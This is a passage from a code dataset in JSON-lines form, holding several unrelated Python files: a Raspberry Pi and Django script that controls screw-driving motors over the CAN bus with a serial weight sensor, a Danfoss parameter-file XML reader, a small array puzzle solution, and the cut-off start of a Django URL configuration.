res\n\nprint(Solution().alienOrder([\"za\",\"zb\",\"ca\",\"cb\"]))\nprint(set('yuan'))\n","sub_path":"Facebook/269.py","file_name":"269.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"109872512","text":"# xz轴第六版,xz轴变为���度模式,添加限位和z轴传感器,记录运行数据,自学习\nimport os\nimport pytz\nimport sys\nimport json\nimport csv\nimport serial\nfrom time import sleep\nimport can\nfrom threading import Thread\nfrom gpiozero import LED, DigitalInputDevice\nimport time\n\nimport django\nfrom django.utils import timezone\nfrom django.db.models import Avg\n\nsys.path.append('..')\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"ScrewDriver.settings\")\n\ndjango.setup()\n\nfrom control.models import Records, ScrewConfig, Weight\n\n\ndef get_current_time(datetimenow=None, naive_datetime=False, customtimezone=None):\n timezone_datetime = datetimenow\n if datetimenow and not datetimenow.tzinfo:\n # change naive datetime to datetime with timezone\n # use timezone.localize will include day light saving to get more accurate timing\n timezone_datetime = pytz.timezone(os.environ.get('TZ')).localize(datetimenow)\n tz = None\n if customtimezone:\n try:\n tz = pytz.timezone(customtimezone)\n except:\n pass\n\n # convert to datetime with user local timezone\n converted_datetime = timezone.localtime(timezone_datetime or timezone.now(), tz)\n # return datetime converted\n return converted_datetime.replace(tzinfo=None) if naive_datetime else converted_datetime\n\n\nclass Motor:\n\n def __init__(self, can_channel, motor_id):\n \"\"\"\n Initialization of can motors\n :param can_channel:name of can device\n :param motor_id:can id of motor\n \"\"\"\n self.bus = can.interface.Bus(\n channel=can_channel, bustype='socketcan_ctypes')\n self.speed = 0\n self.now_speed = 0\n self.position = 0\n self.current = 0\n self.motor_id = motor_id\n self.weight = 0\n self.weight_z = 0\n self.left_limit = 0\n self.right_limit = 0\n self.up_limit = 0\n self.down_limit = 0\n self.ser = serial.Serial('/dev/ttyUSB0', baudrate=57600)\n self.refresh_run()\n\n def refresh_run(self):\n t = Thread(target=self.refresh, name='refresh_can')\n t.setDaemon(True)\n t.start()\n t2 = Thread(target=self.serial_refresh, name='refresh_serial')\n t2.setDaemon(True)\n t2.start()\n t3 = Thread(target=self.button_refresh, name='refresh_button')\n t3.setDaemon(True)\n t3.start()\n t4 = Thread(target=self.limit_refresh, name='refresh_limit')\n t4.setDaemon(True)\n t4.start()\n print('four thread ok~')\n\n def limit_refresh(self):\n left = DigitalInputDevice(6)\n right = DigitalInputDevice(13)\n up = DigitalInputDevice(26)\n down = DigitalInputDevice(19)\n while True:\n self.left_limit = left.value\n self.right_limit = right.value\n self.up_limit = up.value\n self.down_limit = down.value\n sleep(0.01)\n\n def button_refresh(self):\n b_out = DigitalInputDevice(27)\n b_in = DigitalInputDevice(17)\n bin_pre = 0\n bout_pre = 0\n while True:\n bin_now = b_in.value\n bout_now = b_out.value\n sleep(0.01)\n bin_now2 = b_in.value\n bout_now2 = b_out.value\n\n if bin_now and bin_now2:\n bin_now = 1\n else:\n bin_now = 0\n\n if bout_now and bout_now2:\n bout_now = 1\n else:\n bout_now = 0\n if bin_now and not bin_pre:\n print('power on ppp')\n poweron_p()\n elif bout_now and not bout_pre:\n print('power on nnn')\n poweron_n()\n elif not any([bin_now, bout_now]) and any([bin_pre, bout_pre]):\n sleep(0.1)\n print('poweroff...')\n # poweroff()\n else:\n pass\n bin_pre = bin_now\n bout_pre = bout_now\n sleep(0.3)\n\n def serial_refresh(self):\n p = LED(21)\n p.on()\n while True:\n self.ser.write([0x32, 0x03, 0x00, 0x50, 0x00, 0x02, 0xC4, 0x1A])\n sleep(0.05)\n weight_data = self.ser.read_all()\n try:\n weight = round(int('0x' + weight_data.hex()[10:14], 16) * 
0.001, 3)\n if weight >= 10:\n weight = 0\n except Exception as e:\n print('errorsssssssssssss', e)\n weight = 0\n try:\n with open('weight.json', 'w') as f:\n json.dump({'weight': weight}, f)\n\n with open('adjust_screw_config.json', 'r') as f:\n config = json.load(f)\n\n if weight > config['n']:\n self.weight = weight\n # print('ssssssssssss> max s : {}'.format(weight))\n\n # protect io\n p.off()\n print('ppppppppppppp')\n sleep(0.1)\n p.on()\n except Exception as e:\n print('error ssss22222222', e)\n\n # get weight_z value\n self.ser.write([0x01, 0x03, 0x00, 0x50, 0x00, 0x02, 0xC4, 0x1A])\n sleep(0.05)\n weight_data_m = self.ser.read_all()\n try:\n weight_z = round(int('0x' + weight_data_m.hex()[10:14], 16) * 0.01, 3)\n if weight_z >= 10:\n # print('////////////>>>', weight_z)\n weight_z = 0\n except Exception as e:\n print('errorzzzzzzzzzzzzzz', e)\n weight_z = 0\n try:\n if weight_z > 1:\n self.weight_z = weight_z\n # print('zzzzzzzzzzzzzzzz> max z : {}'.format(weight_z))\n except Exception as e:\n print('error zzzzzz2222222222', e)\n\n def refresh(self):\n while True:\n data = self.bus.recv()\n if data.arbitration_id != 0x1b:\n continue\n data = data.data\n if data[3] > 0xee:\n now_speed = (data[3] - 0xff) * 256 + (data[2] - 0xff)\n else:\n now_speed = data[2] | (data[3] << 8)\n self.now_speed = now_speed\n self.current = data[0] | (data[1] << 8)\n self.position = data[4] | (data[5] << 8) | (data[6] << 16) | (data[7] << 24)\n # print(self.current, self.now_speed, self.position)\n direction = 1 if self.now_speed > 0 else -1\n # sleep(0.1)\n screw_data = {'speed': self.now_speed, 'current': self.current if self.current < 10000 else 0,\n 'direction': direction}\n with open('screw.json', 'w') as f:\n json.dump(screw_data, f)\n sleep(0.001)\n\n def send(self, aid, data):\n print(time.ctime() + 'can data {}'.format(data))\n msg = can.Message(arbitration_id=aid, data=data, extended_id=False)\n self.bus.send(msg, timeout=1)\n sleep(0.01)\n\n def speed_mode(self, speed):\n \"\"\"\n :param speed: integer, -255 to 255, speed of left motor, positive speed will go forward,\n negative speed will go backward\n :return:\n \"\"\"\n s_speed = speed & 0xff\n times = speed >> 8 & 0xff\n self.send(self.motor_id, [s_speed, times])\n\n\ndef poweron_p():\n with open('adjust_screw_config.json', 'r') as f:\n config = json.load(f)\n config.update({'power': 1, \"direction\": 1})\n with open('adjust_screw_config.json', 'w') as f:\n json.dump(config, f)\n\n\ndef poweron_n():\n with open('adjust_screw_config.json', 'r') as f:\n config = json.load(f)\n config.update({'power': 1, \"direction\": -1})\n with open('adjust_screw_config.json', 'w') as f:\n json.dump(config, f)\n\n\ndef poweroff():\n with open('adjust_screw_config.json', 'r') as f:\n config = json.load(f)\n config.update({'power': 0})\n with open('adjust_screw_config.json', 'w') as f:\n json.dump(config, f)\n\n\nclass MotorX:\n # None for direction ,0x23 => 1 0x24 => -1\n run_data = [0x00, 0x20, None, 0x00, 0x00, 0x00, 0x00, 0x03]\n stop_data = [0x00, 0x20, 0x25, 0x00, 0x00, 0x00, 0x00, 0x01]\n # None for speed level 1,2,3,4,5,6 - (32,16,8,4,2,1) 1 is slowest 6 is fastest\n set_speed_data = [0x00, 0x20, 0x33, None, 0x00, 0x00, 0x00, 0x0a]\n speed_level_mapping = [0x20, 0x10, 0x08, 0x04, 0x02, 0x01]\n\n def __init__(self, can_channel, motor_id):\n \"\"\"\n Initialization of can motors\n :param can_channel:name of can device\n :param motor_id:can id of motor\n \"\"\"\n self.bus = can.interface.Bus(\n channel=can_channel, bustype='socketcan_ctypes')\n 
self.motor_id = motor_id\n self.speed = 0\n self.now_speed = 0\n self.alive = False\n\n def send(self, aid, data):\n msg = can.Message(arbitration_id=aid, data=data, extended_id=False)\n self.bus.send(msg, timeout=1)\n sleep(0.01)\n\n def run(self, step, direction):\n # direction = 1 (left, down)\n # direction = -1 (right, up)\n # 7-14\n if step > 2147483647:\n raise ValueError(\"step parameter must be a int integer and between 0~2147483647\")\n if direction not in (-1, 1):\n raise ValueError(\"The dir can only be 0 or 1, clockwise: 0 anticlockwise: 1\")\n # deal with direction\n self.run_data[2] = 0x23 if direction == 1 else 0x24\n self.run_data[6] = (0xff000000 & step) >> 24\n self.run_data[5] = (0x00ff0000 & step) >> 16\n self.run_data[4] = (0x0000ff00 & step) >> 8\n self.run_data[3] = 0x000000ff & step\n self.send(self.motor_id, self.run_data)\n\n def stop(self):\n self.send(self.motor_id, self.stop_data)\n\n def set_speed_level(self, level):\n level -= 1\n self.set_speed_data[3] = self.speed_level_mapping[level]\n self.send(self.motor_id, self.set_speed_data)\n\n\nclass MotorZ:\n # None for direction ,0x23 => 1 0x24 => -1\n run_data = [0x00, 0x20, None, 0x00, 0x00, 0x00, 0x00, 0x03]\n stop_data = [0x00, 0x20, 0x25, 0x00, 0x00, 0x00, 0x00, 0x01]\n # None for speed level 1,2,3,4,5,6 - (32,16,8,4,2,1) 1 is slowest 6 is fastest\n set_speed_data = [0x00, 0x20, 0x26, None, 0x00, 0x00, 0x00, 0x02]\n\n def __init__(self, can_channel, motor_id):\n \"\"\"\n Initialization of can motors\n :param can_channel:name of can device\n :param motor_id:can id of motor\n \"\"\"\n self.bus = can.interface.Bus(\n channel=can_channel, bustype='socketcan_ctypes')\n self.motor_id = motor_id\n self.speed = 0\n self.now_speed = 0\n self.alive = False\n\n def send(self, aid, data):\n msg = can.Message(arbitration_id=aid, data=data, extended_id=False)\n self.bus.send(msg, timeout=1)\n sleep(0.01)\n\n def speed_mode(self, speed):\n # speed > 0 forward, speed < 0 backward, speed = 0 stop\n self.run_data[2] = 0x23 if speed > 0 else 0x24\n if speed > 0:\n self.run_speed_mode(speed)\n if speed < 0:\n self.run_speed_mode(-speed)\n if speed == 0:\n self.send(self.motor_id, self.stop_data)\n print('stopzzzzzzzzzzzzzzzzz')\n\n def run_speed_mode(self, speed):\n self.set_speed_data[6] = (0xff000000 & speed) >> 24\n self.set_speed_data[5] = (0x00ff0000 & speed) >> 16\n self.set_speed_data[4] = (0x0000ff00 & speed) >> 8\n self.set_speed_data[3] = 0x000000ff & speed\n self.send(self.motor_id, self.set_speed_data)\n sleep(0.05)\n self.send(self.motor_id, self.run_data)\n\n\ndef main():\n x = MotorX('can0', 0xc1)\n z = MotorZ('can0', 0xc2)\n x.set_speed_level(3)\n\n can_motors = Motor('can0', 0x13)\n n = 0\n i = 0\n # cycle times\n m = 0\n\n step = 0\n step_right = 0\n total = 0\n total_up = 0\n\n p = 0\n\n man_position = 0\n man_cycle = 0\n\n speed = 0.9\n direction = 1\n actual_speed = 50\n # speed2 should < 1000\n speed1 = 304\n speed2 = 500\n settle_speed = 0\n while True:\n\n try:\n with open('adjust_screw_config.json', 'r') as f:\n config = json.load(f)\n except Exception as e:\n print('config error', e)\n config = {\"speed\": 1, \"speed2\": 350, \"direction\": 1, \"n\": 1, \"n2\": 2, \"power\": 1, \"auto\": 1, \"position\": 0}\n # power 1 :on 0:off\n power = config['power']\n weight = config['n']\n weight2 = 2\n auto = config['auto']\n # default 0, values=1,2,3\n position = config['position']\n screw_type = 'test001'\n\n # i += 1\n # print('iiiiiiiii', i)\n\n if power == 1:\n\n if auto == 1:\n # pre-start\n r = 0\n p += 
1\n while True:\n r += 1\n can_motors.speed_mode(0)\n sleep(0.5)\n\n if p != 1:\n break\n elif r >= 5:\n break\n settled_list = Records.objects.filter(screw_type='test001', is_settled=True).distinct() \\\n .aggregate(Avg('total_time'))\n if settled_list['total_time__avg']:\n avg_time = settled_list['total_time__avg']\n print('%%%%%%%%%%%%%avg_time', avg_time)\n else:\n record_list = Records.objects.filter(direction=1, d_weight__gt=0, total_time__gt=0,\n screw_type='test001').distinct().aggregate(Avg('total_time'))\n print('record_list==========', record_list)\n avg_time = record_list['total_time__avg'] if record_list['total_time__avg'] else 0.0\n if avg_time != 0.0:\n s_time = avg_time - 0.5\n print('sssssssssss_time', s_time)\n\n if s_time > 0:\n # first stage\n print('start...')\n z.speed_mode(speed2)\n if can_motors.weight_z > 1:\n print('can_motors.weight_z===========', can_motors.weight_z)\n record = Records()\n record.screw_type = screw_type\n record.speed = speed1\n record.direction = 1\n record.current = can_motors.current if can_motors.current < 10000 else 0\n record.config_weight = weight\n record.start_time = get_current_time()\n \n can_motors.speed_mode(speed1)\n sleep(s_time)\n\n z.speed_mode(0)\n # second stage\n print('actual_speeddddddddddddddd', actual_speed)\n while True:\n can_motors.speed_mode(actual_speed)\n record.actual_speed = actual_speed\n if can_motors.weight > weight:\n break\n if can_motors.weight > weight:\n print('can_motors.weight2222222222222', can_motors.weight)\n m += 1\n\n record.cycle = m\n record.weight = can_motors.weight\n record.d_weight = can_motors.weight - weight\n record.end_time = get_current_time()\n record.total_time = (record.end_time - record.start_time).total_seconds()\n if record.total_time - avg_time > 0.5:\n record.total_time = 0\n print('record.total_time&&&&&&&&&&&&&&', record.total_time)\n\n if record.d_weight > 3:\n print('cycle...up...')\n while True:\n z.speed_mode(-speed2)\n if can_motors.up_limit == 1:\n z.speed_mode(0)\n print('cycle...stop...')\n\n with open('adjust_screw_config.json', 'r') as f:\n config = json.load(f)\n config.update({'power': 0})\n with open('adjust_screw_config.json', 'w') as f:\n json.dump(config, f)\n break\n record.save()\n can_motors.weight = 0\n\n else:\n\n if record.d_weight > 1 and actual_speed > 5:\n actual_speed -= 5\n # if record.d_weight < 1:\n # record.is_settled = True\n # print('settled...')\n # actual_speed += 5\n else:\n record.is_settled = True\n print('settled...')\n record.save()\n can_motors.weight = 0\n\n print('here here...')\n sleep(4.5)\n # reverse\n can_motors.speed_mode(-speed1)\n z.speed_mode(-speed2)\n\n record = Records()\n record.screw_type = screw_type\n record.cycle = m\n record.speed = -speed1\n record.direction = -1\n record.current = can_motors.current if can_motors.current < 10000 else 0\n record.weight = can_motors.weight\n record.save()\n\n sleep(s_time)\n print('gaga')\n\n can_motors.speed_mode(0)\n can_motors.weight = 0\n z.speed_mode(-200)\n sleep(1.5)\n z.speed_mode(0)\n can_motors.weight_z = 0\n\n config_data = ScrewConfig()\n config_data.n = weight\n config_data.power = power\n config_data.direction = direction\n config_data.speed = speed1\n config_data.actual_speed = actual_speed\n config_data.cycle = m\n config_data.save()\n\n print('end...')\n sleep(2)\n\n print('again...')\n else:\n print('run time too short!!!')\n with open('adjust_screw_config.json', 'r') as f:\n config = json.load(f)\n config.update({'power': 0})\n with open('adjust_screw_config.json', 
'w') as f:\n json.dump(config, f)\n else:\n print('initial...start...')\n z.speed_mode(speed2)\n if can_motors.weight_z > 1:\n record = Records()\n record.screw_type = screw_type\n record.speed = speed1\n record.direction = 1\n record.current = can_motors.current if can_motors.current < 10000 else 0\n record.config_weight = weight\n record.start_time = get_current_time()\n while True:\n can_motors.speed_mode(speed1)\n\n if can_motors.weight > weight:\n z.speed_mode(0)\n print('can_motors.weight>>>>>>>>>>>>', can_motors.weight)\n m += 1\n\n record.cycle = m\n record.weight = can_motors.weight\n record.d_weight = can_motors.weight - weight\n record.end_time = get_current_time()\n record.total_time = (record.end_time - record.start_time).total_seconds()\n record.save()\n print('record.total_time$$$$$$$$$$$$', record.total_time)\n\n if record.d_weight > 3:\n print('initial...up...')\n while True:\n z.speed_mode(-speed2)\n if can_motors.up_limit == 1:\n z.speed_mode(0)\n print('initial...stop...')\n\n with open('adjust_screw_config.json', 'r') as f:\n config = json.load(f)\n config.update({'power': 0})\n with open('adjust_screw_config.json', 'w') as f:\n json.dump(config, f)\n break\n can_motors.weight = 0\n else:\n print('initial...here here...')\n sleep(4.5)\n # reverse\n print('initial...haha...')\n can_motors.speed_mode(-speed1)\n z.speed_mode(-speed2)\n\n record = Records()\n record.screw_type = screw_type\n record.cycle = m\n record.speed = -speed1\n record.direction = -1\n record.current = can_motors.current if can_motors.current < 10000 else 0\n record.weight = can_motors.weight\n record.save()\n\n sleep(record.total_time)\n print('initial...gaga...')\n\n can_motors.speed_mode(0)\n can_motors.weight = 0\n z.speed_mode(-200)\n sleep(1.5)\n z.speed_mode(0)\n can_motors.weight_z = 0\n\n config_data = ScrewConfig()\n config_data.n = weight\n config_data.power = power\n config_data.direction = direction\n config_data.speed = speed1\n config_data.actual_speed = actual_speed\n config_data.cycle = m\n config_data.save()\n\n print('initial...end...')\n sleep(2)\n\n print('initial...again...')\n break\n\n # else:\n # print('stand by...')\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"control/demo_adjust_run_screw_3_new.py","file_name":"demo_adjust_run_screw_3_new.py","file_ext":"py","file_size_in_byte":24629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"418188863","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\n@Time : 2017/6/19 21:47\n@Author : Mr.Sprint\n@File : Read_xml.py\n@Software: PyCharm\n'''\n#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport easygui as g\nimport os.path\nimport binascii\nfrom xml.dom.minidom import parse\nimport xml.dom.minidom\nimport csv\nflag = 1\nMM_ID_Str = str()\nread_file_dict = dict()#normal mme file\nparameter_dict = dict()#just for parameter\npar_filecontent_list = list()\nParameterRecord_dict = dict()\nChoiceTable_dict = dict()\ncommand_list =[\n \"Read Firmware\",\n \"Read SIVP\",#Filename, version number, list of parameters+values in the file\n \"Read CSIV\",#Filename, version number, list of parameters+values in the file\n \"Read Parameter\",#List of parameters+values in the file\n \"Motor DataBase\",\n 'All File'\n ]\n\n\ndef paremeter_read_lines(filename):\n with open(filename, 'rb') as f:\n for each_lines in f:\n for each_char in each_lines:\n par_filecontent_list.append(int(binascii.b2a_hex(each_char), 16))\n parameter_dict['File Type'] = par_filecontent_list[0:1]\n parameter_dict['Type code'] = par_filecontent_list[8:9]\n parameter_dict['Num of parameters'] = par_filecontent_list[9:10]\n parameter_dict['Size of enter header'] = par_filecontent_list[10:11]\n parameter_dict['File format version'] = par_filecontent_list[11:13]\n parameter_dict['Software version'] = par_filecontent_list[13:15]\n parameter_dict['databese version'] = par_filecontent_list[15:17]\n parameter_dict['Motor Power'] = par_filecontent_list[17:18]\n parameter_dict['Motor Voltage'] = par_filecontent_list[18:19]\n parameter_dict['Motor Frequency'] = par_filecontent_list[19:20]\n parameter_dict[r'Signal phase/Three phase'] = par_filecontent_list[20:21]\n\ndef file_read_lines(filename):\n #将来这里要清除字典的信息\n filecontent_list = list()\n with open(filename, 'rb') as f:\n for each_lines in f:\n for each_char in each_lines:\n filecontent_list.append(int(binascii.b2a_hex(each_char), 16))\n read_file_dict['File Format'] = filecontent_list[0:1]\n read_file_dict['Number of elements'] = filecontent_list[1:3]\n read_file_dict['File Version'] = filecontent_list[3:4]\n read_file_dict['MMM ID'] = filecontent_list[4:22]\n\ndef find_MMfile(dirpath,filename):\n for root, dirs, files in os.walk(dirpath):\n for file in files:\n if filename == file:\n if filename == 'CSIV.mme' or filename == 'SIVP.mme' or filename == 'Parameter.par':\n paremeter_read_lines(filename)\n else:\n file_read_lines(filename)\n\ndef create_csv_file():\n pass\n\ndef read_xmlfile(filename):\n\n # 使用minidom解析器打开XML文档\n DOMTree = xml.dom.minidom.parse(\"FC280_0140.xml\")\n Data = DOMTree.documentElement\n ParameterRecords = Data.getElementsByTagName(\"ParameterRecord\")\n ChoiceRecords = Data.getElementsByTagName(\"ChoiceRecord\")\n print(\"*****ParameterRecord*****\")\n for ParameterRecord in ParameterRecords:\n try:\n data_dict = dict()\n Index = ParameterRecord.getElementsByTagName('ParamIndex')[0]\n data_dict['ParamIndex'] = Index.childNodes[0].data\n\n Mark = ParameterRecord.getElementsByTagName('ParamMark')[0]\n data_dict['ParamMark'] = Mark.childNodes[0].data\n\n ReadOnly = ParameterRecord.getElementsByTagName('ReadOnly')[0]\n data_dict['ReadOnly'] = ReadOnly.childNodes[0].data\n\n ShowInPC = ParameterRecord.getElementsByTagName('ShowInPC')[0]\n data_dict['ShowInPC'] = ShowInPC.childNodes[0].data\n\n ChoiceTableIndex = ParameterRecord.getElementsByTagName('ChoiceTableIndex')[0]\n data_dict['ChoiceTableIndex'] = 
ChoiceTableIndex.childNodes[0].data\n except IndexError as e:\n print (e)\n finally:\n Number = ParameterRecord.getElementsByTagName('ParamNumber')[0]\n ParameterRecord_dict[Number.childNodes[0].data] = data_dict\n\n print (ParameterRecord_dict)\n print(\"*****ChoiceRecord*****\")\n for ChoiceRecord in ChoiceRecords:\n\n data_dict = dict()\n ChoiceName = ChoiceRecord.getElementsByTagName('ChoiceName')[0]\n data_dict['ChoiceName'] = ChoiceName.childNodes[0].data\n ChoiceDescription = ChoiceRecord.getElementsByTagName('ChoiceDescription')[0]\n data_dict['ChoiceDescription'] = ChoiceDescription.childNodes[0].data\n\n ChoiceValue = ChoiceRecord.getElementsByTagName('ChoiceValue')[0]\n data_dict['ChoiceValue'] = ChoiceValue.childNodes[0].data\n\n Index = ChoiceRecord.getElementsByTagName('Index')[0]\n ChoiceTable_dict[Index.childNodes[0].data] = data_dict\n print(ChoiceTable_dict)\n\nread_xmlfile(\"FC280_0140.xml\")\n\n'''dirname = g.diropenbox(\"Please Open MM Folder\")\nos.chdir(dirname)\n\nfind_MMfile('.','FIRMWARE.MME')\nfor MM_ID in read_file_dict['MMM ID'][8:18]:\n MM_ID_Str = MM_ID_Str + ' ' + \"%d\" % MM_ID\nMM_msg = \"Read MM ID Success\\nMM ID is\" + MM_ID_Str\nwhile(flag):\n replay = g.choicebox(MM_msg, title='Danfoss MM PC tools',choices=command_list)\n if replay not in command_list:\n quit()\n elif replay == 'All File':\n pass\n else:\n replay = replay.split(' ')[1] + \".mme\"\n find_MMfile('.',replay)\n'''\n","sub_path":"Read_xml.py","file_name":"Read_xml.py","file_ext":"py","file_size_in_byte":5459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"179599617","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# @Time : 2020/7/13 17:30\n# @Author : lirixiang\n# @Email : 565539277@qq.com\n# @File : 40-FindNumsAppearOnce.py\n\"\"\"\n一个整型数组里除了两个数字之外,其他的数字都出现了两次。请写程序找出这两个只出现一次的数字。\n\"\"\"\n# -*- coding:utf-8 -*-\nclass Solution:\n # 返回[a,b] 其中ab是出现一次的两个数字\n def FindNumsAppearOnce(self, array):\n # write code here\n noRepeatList = []\n for i in range(len(array)):\n if array[i] not in noRepeatList:\n noRepeatList.append(array[i])\n\n result = {}\n for i in range(len(noRepeatList)):\n count = 0\n for j in range(len(array)):\n if noRepeatList[i] == array[j]:\n count += 1\n result[noRepeatList[i]] = count\n\n resList = []\n for i in result:\n if result[i] == 1:\n resList.append(i)\n return resList\n\n\n\n","sub_path":"src/剑指offer/40-FindNumsAppearOnce.py","file_name":"40-FindNumsAppearOnce.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"256025647","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.hot, name='hot'),\n url(r'^grab$', views.index, name='index'),\n url(r'^(?P\\d+)/(?P